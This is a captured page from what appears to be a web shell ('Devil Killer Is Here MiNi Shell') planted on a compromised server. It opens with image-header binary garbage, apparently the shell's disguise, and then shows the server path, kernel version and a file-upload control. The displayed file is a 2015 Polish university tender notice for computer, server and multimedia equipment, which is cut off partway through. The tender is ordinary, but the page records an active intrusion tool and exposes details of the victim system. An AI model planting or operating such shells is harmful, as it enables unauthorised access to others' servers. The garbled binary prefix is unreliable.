JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150317/58972-N-2015.html

<p class="kh_header"><b>Kalisz: DOSTAWA, MONTAŻ I INSTALACJA SPRZĘTU KOMPUTEROWEGO I  MULTIMEDIALNEGO  DO OBIEKTÓW PAŃSTWOWEJ WYŻSZEJ SZKOŁY ZAWODOWEJ IM. PREZYDENTA STANISŁAWA WOJCIECHOWSKIEGO</b><br>
<b>Numer ogłoszenia: 58972 - 2015; data zamieszczenia: 17.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 62 767 95 00, 767 95 32, faks 62 767 95 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA, MONTAŻ I INSTALACJA SPRZĘTU KOMPUTEROWEGO I  MULTIMEDIALNEGO  DO OBIEKTÓW PAŃSTWOWEJ WYŻSZEJ SZKOŁY ZAWODOWEJ IM. PREZYDENTA STANISŁAWA WOJCIECHOWSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiotem zamówienia jest dostawa, montaż i instalacja wyposażenia komputerowego i multimedialnego, poleasingowych serwerów przeznaczonych do celów edukacyjnych  i administracyjnych oraz kserokopiarek do obiektów Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu.
2.	Zakres przedmiotu zamówienia obejmuje dostawę przedmiotu zamówienia z podziałem na zadania:
Zadanie nr 1 - sprzęt komputerowy;
Zadanie nr 2 - sprzęt komputerowy poleasingowy - edukacja;
Zadanie nr 3 - sprzęt komputerowy poleasingowy - administracja;
Zadanie nr 4 - sprzęt multimedialny;
Zadanie nr 5 - kserokopiarki.
3.	Wyżej wymieniony sprzęt musi  spełniać co najmniej wymagania minimalne wymienione w Specyfikacji Technicznej (Formularz cenowy), która stanowi załącznik nr 5 do SIWZ     (po wypełnieniu, stanowić będzie załącznik nr 1 do oferty) oraz świadczenie  serwisu gwarancyjnego na warunkach  zawartych w projekcie umowy. 
4.	Zakres przedmiotu zamówienia obejmuje: 
4.1.	dostawę sprzętu, o którym mowa w pkt. 3.1 SIWZ tj.: zakup, transport, rozpakowanie, ustawienie przedmiotowego sprzętu,
4.2.	montaż i instalację sprzętu, o którym mowa w pkt. 3.1 SIWZ, w tym:  podłączenie  do sieci elektrycznej i logicznej, instalację wymaganego okablowania, uruchomienie     i sprawdzenie działania  dostarczonego sprzętu i oprogramowania.
4. Zaoferowany przez Wykonawcę sprzęt stanowiący przedmiot zamówienia ma być:
4.3.	dla Zadania nr 1, 4, 5 - fabrycznie nowy (nie używany) o zaoferowanych parametrach technicznych, niewadliwy, w najlepszym gatunku pod względem technicznym, jakościowym i użytkowym. 4.4.	dla Zadania nr 2, 3 - poleasingowy, w pełni sprawny, wyposażony w nowe dyski twarde. 
5.	Wykonawca dostarczy wszystkie sterowniki i pakiety serwisowe  niezbędne do  prawidłowego działania systemu.
6.	Zaoferowany przez Wykonawcę sprzęt stanowiący przedmiot zamówienia musi  posiadać 
           deklarację zgodności CE (w języku polskim lub  angielskim) i być oznaczony tym znakiem,
           zgodnie z obowiązującymi przepisami.  Właściwe dokumenty ( zaświadczenia podmiotu
    potwierdzające spełniane normy CE ) zostaną załączone do  dokumentów  odbiorowych 
    sprzętu. Brak tych  dokumentów spowoduje nie podpisanie przez Zamawiającego protokołu    
    odbioru i nie odebranie sprzętu.
7. Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy 
          pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają
          parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza 
          złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach
technicznych, eksploatacyjnych i użytkowych. Zgodnie z art.30 ust.5 ustawy Prawo 
zamówień publicznych, Wykonawca, który powołuje się na rozwiązania równoważne 
opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego
 dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego 
( np. przedstawić porównanie parametrów technicznych sprzętu wymaganego przez  Zamawiającego z parametrami oferowanego sprzętu itp.).
9.1. Zamawiający wymaga udzielenia na piśmie gwarancji  i rękojmi na wykonany
przedmiot zamówienia na okres nie krótszy niż 24 miesiące (dla Zadania nr 1, 4, 5)     oraz nie krótszy niż 12 miesięcy (dla Zadania nr 2 i 3) licząc od daty podpisania końcowego protokołu  odbioru przez Zamawiającego.
9.2.  Zamawiający wymaga, aby  Wykonawca zapewnił serwis w okresie gwarancyjnym w
                 ramach którego będzie nieodpłatnie usuwał zgłoszone usterki lub wady, świadczył usługi
                 doradztwa technicznego, o ile zajdzie taka potrzeba. 
9.3.  Wykonawca zobowiązany jest do reakcji serwisowej w ciągu 3 dni roboczych licząc  od 
                             dnia zgłoszenia awarii (faksem, e-mailem).
9.4.  Wykonawca zobowiązany jest do usunięcia usterek w ciągu 14 dni od momentu 
                 zawiadomienia przez Zamawiającego. Termin ten może być przedłużony do 30 dni w
                 przypadku udokumentowanej zwłoki w dostawie części zamiennych.
9.5.  Jeżeli czas potrzebny na usunięcie awarii będzie dłuższy niż 7 dni robocze od dnia 
                 zgłoszenia awarii Wykonawca na czas naprawy dostarczy sprzęt zastępczy o 
                 porównywalnych parametrach.
9.6.  Okres gwarancji i rękojmi ulega przedłużeniu o czas napraw.
9.7. Okres gwarancji biegnie na nowo dla urządzenia bądź elementu /podzespołu/ modułu wymienionego.
9.8. Wszelkie naprawy będą odbywały się u Zamawiającego, w przypadku konieczności  napraw poza siedzibą Zamawiającego - koszt transportu będzie ponosił Wykonawca.
10. W przypadku gdy zaoferowany przez Wykonawcę sprzęt został wycofany z produkcji 
         Zamawiający dopuszcza po uzgodnieniu dostarczenie sprzętu o parametrach równoważnych
         bądź lepszych.
11. Dla Zadania 1, 2 i 3 Zamawiający powinien mieć prawo otwarcia obudowy  np. w celu zainstalowania dodatkowego dysku twardego bez utraty  gwarancji.
12. Dla Zadania 1: poz. 5 i 6 - Monitor 23 cale oraz komputer All In One poz. 29 - Zamawiający nie dopuszcza żadnych martwych pikseli.
13. Zamawiający wymaga, aby Wykonawca dokonał wizji lokalnej (dla Zadania nr 4) w pomieszczeniach Zamawiającego (Kalisz, ul. Nowy Świat 4 i 4a oraz ul. Łódzka 149), potwierdzonej protokołem podpisanym przez Zamawiającego, koniecznej do wykonania rzetelnej wyceny systemu, a w szczególności montażu projektorów, ekranów i gniazd przyłączeniowych we wskazanych miejscach.
14. Wszystkie koszty związane z dostawą , transportem, rozmieszczeniem, ustawieniem,
        montażem i instalacją sprzętu  pokryje Wykonawca.
15. Wykonawca na jednorazowe żądanie Zamawiającego, które może nastąpić w terminie do 12 miesięcy od daty zawarcia umowy, odbierze nieodpłatnie od Zamawiającego zużyty sprzęt przeznaczony do utylizacji w ilości nie przekraczającej sztuki za sztukę danego typu (np. serwer za serwer itp.) i potwierdzi pisemnie odbiór sprzętu przeznaczonego do utylizacji.
16. Zamawiający nie wprowadza zastrzeżenia wskazującego na obowiązek osobistego wykonania 
         przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie 
         części zamówienia podwykonawcom. 
         W przypadku powierzenia wykonania części zamówienia podwykonawcom, Zamawiający
         żąda wskazania przez wykonawcę w Ofercie (Formularzu oferty) zakres zamówienia (w danej
         części zamówienia), którego wykonanie zamierza  powierzyć podwykonawcom. 
         Brak właściwego zapisu w pkt.8 Formularza oferty będzie równoznaczne  z samodzielnym 
         wykonaniem zamówienia przez Wykonawcę.
17. Informacje o umowach o podwykonawstwo, których przedmiotem są dostawy lub  usługi, które z uwagi na wartość lub przedmiot tych dostaw lub usługi, nie podlegają obowiązkowi przedkładania zamawiającemu, zostały określone w SIWZ (wzór umowy)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.23.13.00-0, 30.23.21.10-8, 38.65.21.00-1, 30.21.34.00-9, 32.42.00.00-3, 32.32.46.00-6, 30.12.12.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w niniejszym postępowaniu wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje  w tym zakresie żadnych wymagań, których spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez  Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował   
       należycie  (zakończył)  w okresie  ostatnich 3 lat przed upływem terminu składania
      ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

dla Zadania nr 1 - sprzęt komputerowy - jedna dostawa z montażem i instalacją sprzętu odpowiadającego rodzajowo przedmiotowi  zamówienia tj. sprzęt komputerowy,  o wartości brutto min. 200.000,00 złotych;
dla Zadania nr 4 - sprzęt multimedialny - jedna dostawa z montażem i instalacją sprzętu odpowiadającego rodzajowo przedmiotowi  zamówienia tj. sprzęt multimedialny (np. projektory, ekrany, telewizory),  o wartości brutto min. 100.000,00 złotych;
Zamawiający uznaje za wystarczające wskazanie w wykazie, o którym mowa w pkt. 9.1.2) 
             SIWZ tylko takich dostaw, które potwierdzą spełnianie warunków,  o których mowa w pkt. 
             8.2 SIWZ.

dla Zadania 2,3,5 Zamawiający nie precyzuje  w tym zakresie żadnych wymagań, których spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez  Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje  w tym zakresie żadnych 
       wymagań, których spełnianie  Wykonawca zobowiązany jest wykazać w sposób 
       szczególny. Zamawiający dokona oceny  spełnienia  warunków udziału w 
       postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz 
       z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym 
       mowa w pkt. 9.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje  w tym zakresie żadnych 
       wymagań, których spełnianie  Wykonawca zobowiązany jest wykazać w sposób 
       szczególny. Zamawiający dokona oceny  spełnienia  warunków udziału w 
       postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz 
       z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym 
       mowa w pkt. 9.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie
       precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca   
zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie  złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w  postępowaniu, o którym mowa w pkt. 9.1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty- wzór stanowi załącznik do SIWZ;
2. dokumenty i oświadczenia wymienione w pkt. 9  SIWZ ,
3. wypełniona i podpisana Specyfikacja Techniczna  Formularz cenowy, dla każdego zadania na które składana jest oferta stanowiąca załącznik nr 5 do oferty. Wykonawca w ofertowej Specyfikacji Technicznej musi określić nazwy producentów i modele oferowanego sprzętu oraz parametry techniczne sprzętu (nie może być sformułowań nieprecyzyjnych takich jak lub, np., nie mniejsze niż, min. itp., bądź braku oznaczeń - modelu, nazwy producenta). Zamawiający dopuszcza przy opisie parametrów technicznych wpisanie jak obok w przypadku gdy parametry oferowane są identyczne z wymaganymi przez Zamawiającego. Z oferty  winno jasno wynikać, jaki rodzaj sprzętu i jego elementy oferuje Wykonawca. 
4. w przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
       o którym  mowa w ppkt.10.2. lit.b) lub ppkt. 10.10. - SIWZ. 5) wymagany jest (dla Zadania nr 4) potwierdzony przez Zamawiającego dokument o  odbyciu wizji lokalnej w siedzibie Zamawiającego, o którym mowa w pkt. 3.13 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Warunki gwarancji i rękojmi - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy może nastąpić na podstawie art. 144 ust.1 ustawy, za 
    zgodą obu stron, wyrażoną  na piśmie  w formie  aneksu do umowy, pod rygorem nieważności 
    takiej zmiany i może zostać dokonana,  o ile nie stoi w sprzeczności z regulacjami zawartymi 
     w  ustawie Prawo zamówień publicznych.     
 2. Zamawiający przewiduje możliwość  zmian postanowień zawartej umowy stosunku do treści 
     oferty, na  podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co
     najmniej jednej z okoliczności wskazanych poniżej, z uwzględnieniem podawanych 
     warunków ich wprowadzenia:
1)	zmiana wynagrodzenia, gdy nastąpi zmiana  ustawowej stawki podatku VAT,  przy czym zmianie ulegnie jedynie  cena  brutto (cena netto bez zmian);
2)	jakości lub parametrów zaoferowanych urządzeń - jeżeli zmiany są niezbędne do prawidłowej realizacji przedmiotu zamówienia albo korzystne dla Zamawiającego;
3)	zmiana terminu realizacji zamówienia, wynikająca z czynników obiektywnych lub których strony nie były w stanie przewidzieć pomimo zachowania należytej staranności.
3. Wszystkie powyższe postanowienia, o których mowa w ust.2 stanowią katalog zmian na które 
     Zamawiający  może wyrazić zgodę. Nie stanowią  jednocześnie zobowiązania do wyrażenia 
     takiej zgody. W celu dokonania zmian zapisów umowy wnioskowanych  przez stronę, 
     zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich 
      uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl/biuletyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, Dział Techniczny budynek przy ul. Nowy Świat 5, I piętro, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2015 godzina 11:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, Dział Techniczny budynek przy ul. Nowy Świat 5, I piętro, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż i instalacja wyposażenia komputerowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.23.13.00-0, 30.23.21.10-8, 32.42.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Warunki gwarancji i rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sprzęt komputerowy poleasingowy - edukacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż i instalacja  poleasingowych serwerów przeznaczonych do celów edukacyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.34.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Warunki gwarancji i rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzęt komputerowy poleasingowy - administracja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż i instalacja poleasingowych serwerów przeznaczonych do celów administracyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.34.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Warunki gwarancji i rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sprzęt multimedialny.</p>
